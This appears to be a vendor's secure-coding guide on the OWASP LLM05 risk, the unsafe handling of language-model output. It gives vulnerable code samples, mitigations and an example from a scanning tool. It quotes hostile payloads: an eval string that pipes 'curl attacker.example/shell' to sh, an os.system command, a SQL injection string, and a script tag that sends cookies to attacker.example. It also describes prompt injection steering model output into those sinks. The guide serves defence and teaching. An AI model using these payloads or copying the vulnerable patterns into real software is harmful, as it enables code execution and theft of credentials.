Why is LLM output dangerous?

LLM output is attacker-influenced. Anyone who can influence what the LLM says — through prompt injection, indirect injection via retrieved content, or influence over training data — can potentially control what reaches your application's sinks ( eval() , SQL queries, HTML templates). LLM output must be treated as untrusted user input at every point it touches a sensitive operation.

Is structured output (JSON mode) enough to prevent injection?

JSON mode constrains the output format to valid JSON, but it does not constrain values . A JSON string field can still contain a SQL injection payload or script tag. Structured output with a Pydantic schema that enforces field types, lengths, and patterns provides meaningful protection. JSON mode alone is not sufficient.

How do I safely render LLM output in HTML?

Use Jinja2 with autoescaping enabled (the default in Flask and Django). Never wrap LLM content in Markup() , Django's mark_safe() , or any other function that disables HTML escaping. If you need to render rich text from an LLM, parse it through a safe Markdown-to-HTML library (like bleach ) with an explicit allowlist of safe HTML tags.

Can I let an agent run shell commands safely?

Not safely in the general case. Shell command execution from LLM agents is an LLM08 (Excessive Agency) risk. If you need the LLM to run computations, use a sandboxed interpreter with explicit capability restrictions and no network or filesystem access. For arithmetic, use structured output and compute server-side. For code generation, evaluate in a container with resource limits and no sensitive data access.

What's the difference between LLM05 and LLM08 (Excessive Agency)?

LLM05 is about untrusted LLM output reaching dangerous sinks in your code (eval, SQL, HTML). LLM08 is about LLM agents being granted excessive tool permissions, autonomy, or capabilities. They often co-occur: an agent with shell tool access (LLM08) that receives a prompt-injected instruction (LLM01) that produces a malicious shell command (LLM05) executed without approval is a critical severity chain.

How can I scan my codebase for unsafe LLM output sinks?

Run llmarmor scan ./src . LLMArmor's taint analysis tracks variables named with LLM-context indicators ( llm_response , ai_output , chat_result ) and any tainted variable from a user-controlled source to dangerous sinks: eval() , exec() , subprocess.* , os.system() , Markup() , render_template_string() , and SQL f-string interpolation.

LLM05: Improper Output Handling — Stop Trusting LLM Output

In March 2023, a security researcher disclosed CVE-2023-29374 — a remote code execution vulnerability in LangChain’s LLMMathChain. The chain worked by asking the LLM to produce a Python arithmetic expression and then calling eval() on the response. An attacker who could influence the math problem being solved could get the LLM to return __import__('os').system('curl attacker.example/shell | sh'), which eval() would execute with the application’s full privileges. A few months later, CVE-2023-36258 hit LangChain’s PALChain for the same reason: exec() on LLM output. The vulnerability wasn’t in the LLM. It was in the code that assumed LLM output was safe to execute.

Why LLM output is just untrusted user input

The moment you pass LLM output to any function that interprets its content — eval(), exec(), os.system(), a raw SQL string, a Jinja template — the LLM becomes the attack surface. An adversary who achieves prompt injection (LLM01) or who can influence the training data or fine-tuning examples (LLM04) can craft responses that exploit whichever sinks your application exposes.

Think of it this way: if a user could make the LLM say anything, what could they make your application do? If the answer is “execute arbitrary code” or “query any database row,” you have an LLM05 vulnerability.

Traditional AppSec thinking calls this a taint flow: user input → LLM response → dangerous sink. The LLM is just a non-deterministic relay in the taint chain. The fix is the same as for any taint flow: sanitize, validate, and use safe APIs at the sink.

Exploit examples

RCE via eval()

# VULNERABLE: LLM output passed directly to eval()
from langchain.chat_models import ChatOpenAI

llm = ChatOpenAI(model="gpt-4o")

def calculate(expression: str) -> str:
    prompt = f"Return only a Python arithmetic expression for: {expression}"
    response = llm.invoke(prompt)
    result = eval(response.content)  # VULNERABLE: RCE
    return str(result)

Attacker input: "1 + 1; __import__('os').system('id > /tmp/pwned')"

The LLM returns a valid-looking expression that embeds a shell command. eval() executes it.

SQL injection via f-string

# VULNERABLE: LLM output interpolated into SQL query
def lookup_user(user_description: str) -> dict:
    response = llm.invoke(f"Extract the username from: {user_description}")
    llm_name = response.content.strip()

    cursor.execute(                                      # VULNERABLE: SQLi
        f"SELECT * FROM users WHERE name = '{llm_name}'"
    )
    return cursor.fetchone()

Attacker input: "john' OR '1'='1' --" → LLM echoes it → SQL returns all rows.

XSS via Markup()

# VULNERABLE: LLM summary rendered without escaping
from markupsafe import Markup
from flask import render_template_string

def render_summary(article_url: str) -> str:
    response = llm.invoke(f"Summarize: {article_url}")
    # VULNERABLE: Markup() disables autoescaping — LLM output renders as raw HTML
    return render_template_string("<div>{{ summary }}</div>", summary=Markup(response.content))

Attacker-controlled article content (indirect injection): <script>fetch('https://attacker.example/steal?c='+document.cookie)</script>

Mitigations

M1: Never pass LLM output to eval/exec/shell

Replace code-execution sinks with parser-based alternatives. If you need the LLM to produce structured data, use structured output with a schema:

from pydantic import BaseModel
import openai

class MathResult(BaseModel):
    expression: str   # validated string, not executed
    result: float     # LLM computes the value, not eval()

client = openai.OpenAI()

def calculate_safe(problem: str) -> float:
    response = client.beta.chat.completions.parse(  # SAFE: structured output
        model="gpt-4o",
        messages=[{"role": "user", "content": f"Solve: {problem}. Return JSON."}],
        response_format=MathResult,
    )
    return response.choices[0].message.parsed.result  # SAFE: typed float, not exec'd

M2: Parameterized queries for SQL

Always use parameterized queries (or an ORM) when LLM output reaches a database:

# BAD: f-string SQL with LLM output
cursor.execute(f"SELECT * FROM users WHERE name = '{llm_name}'")  # VULNERABLE

# GOOD: parameterized query
cursor.execute(                                                    # SAFE
    "SELECT * FROM users WHERE name = %s",
    (llm_name,),
)

# GOOD: ORM (SQLAlchemy)
user = session.query(User).filter(User.name == llm_name).first()  # SAFE

M3: Output encoding for HTML rendering

Use Jinja2’s autoescaping. Never wrap LLM content in Markup() or Django’s mark_safe():

# BAD: disables autoescaping
return render_template_string(
    "<div>{{ summary }}</div>",
    summary=Markup(response.content)  # VULNERABLE: XSS
)

# GOOD: let Jinja2 escape automatically
return render_template_string(
    "<div>{{ summary }}</div>",
    summary=response.content          # SAFE: autoescaped by default
)

M4: Schema-validated structured output

For any LLM output that feeds downstream logic, use OpenAI’s structured output (or a compatible equivalent) with a Pydantic schema. This constrains the LLM’s response to a known shape, eliminating free-form text from reaching sinks:

from pydantic import BaseModel, Field
import openai

class SearchQuery(BaseModel):
    entity_name: str = Field(max_length=100)
    entity_type: str = Field(pattern=r'^(user|product|order)$')  # allowlist via regex
    limit: int = Field(ge=1, le=100)

client = openai.OpenAI()

def build_query(user_request: str) -> SearchQuery:
    response = client.beta.chat.completions.parse(
        model="gpt-4o",
        messages=[{"role": "user", "content": user_request}],
        response_format=SearchQuery,  # SAFE: validated schema
    )
    return response.choices[0].message.parsed

query = build_query("find the last 10 orders for user john_doe")
cursor.execute(                       # SAFE: typed, validated values
    "SELECT * FROM orders WHERE user = %s LIMIT %s",
    (query.entity_name, query.limit),
)

Detecting LLM05 with LLMArmor

LLMArmor’s taint analysis tracks LLM response variables (by name heuristic and AST taint) to dangerous sinks. It catches eval(llm_response.content) and similar patterns at commit time.

pip install llmarmor
llmarmor scan ./src

Example finding:

LLM05 — Improper Output Handling [CRITICAL]
  chains.py:14  eval(response.content)
  LLM output variable 'response.content' passed to eval() — remote code execution risk.
  Fix: never pass LLM output to eval()/exec(). Use structured output with a Pydantic schema.
  Ref: https://owasp.org/www-project-top-10-for-large-language-model-applications/

See the full OWASP LLM Top 10 coverage reference for all LLM05 sink patterns.

Frequently asked questions

Why is LLM output dangerous?: LLM output is attacker-influenced. Anyone who can influence what the LLM says — through prompt injection, indirect injection via retrieved content, or influence over training data — can potentially control what reaches your application's sinks (eval(), SQL queries, HTML templates). LLM output must be treated as untrusted user input at every point it touches a sensitive operation.
Is structured output (JSON mode) enough to prevent injection?: JSON mode constrains the output format to valid JSON, but it does not constrain values. A JSON string field can still contain a SQL injection payload or script tag. Structured output with a Pydantic schema that enforces field types, lengths, and patterns provides meaningful protection. JSON mode alone is not sufficient.
How do I safely render LLM output in HTML?: Use Jinja2 with autoescaping enabled (the default in Flask and Django). Never wrap LLM content in Markup(), Django's mark_safe(), or any other function that disables HTML escaping. If you need to render rich text from an LLM, parse it through a safe Markdown-to-HTML library (like bleach) with an explicit allowlist of safe HTML tags.
Can I let an agent run shell commands safely?: Not safely in the general case. Shell command execution from LLM agents is an LLM08 (Excessive Agency) risk. If you need the LLM to run computations, use a sandboxed interpreter with explicit capability restrictions and no network or filesystem access. For arithmetic, use structured output and compute server-side. For code generation, evaluate in a container with resource limits and no sensitive data access.
What's the difference between LLM05 and LLM08 (Excessive Agency)?: LLM05 is about untrusted LLM output reaching dangerous sinks in your code (eval, SQL, HTML). LLM08 is about LLM agents being granted excessive tool permissions, autonomy, or capabilities. They often co-occur: an agent with shell tool access (LLM08) that receives a prompt-injected instruction (LLM01) that produces a malicious shell command (LLM05) executed without approval is a critical severity chain.
How can I scan my codebase for unsafe LLM output sinks?: Run llmarmor scan ./src. LLMArmor's taint analysis tracks variables named with LLM-context indicators (llm_response, ai_output, chat_result) and any tainted variable from a user-controlled source to dangerous sinks: eval(), exec(), subprocess.*, os.system(), Markup(), render_template_string(), and SQL f-string interpolation.

OWASP LLM Top 10 Guide Complete guide to all 10 LLM risks with mitigations.

LLM01: Prompt Injection How prompt injection sets up LLM05 exploits.

OWASP Coverage Reference All LLM05 sink patterns detected by LLMArmor.

LLMArmor vs Lakera Guard Static analysis vs runtime firewall for LLM output risks.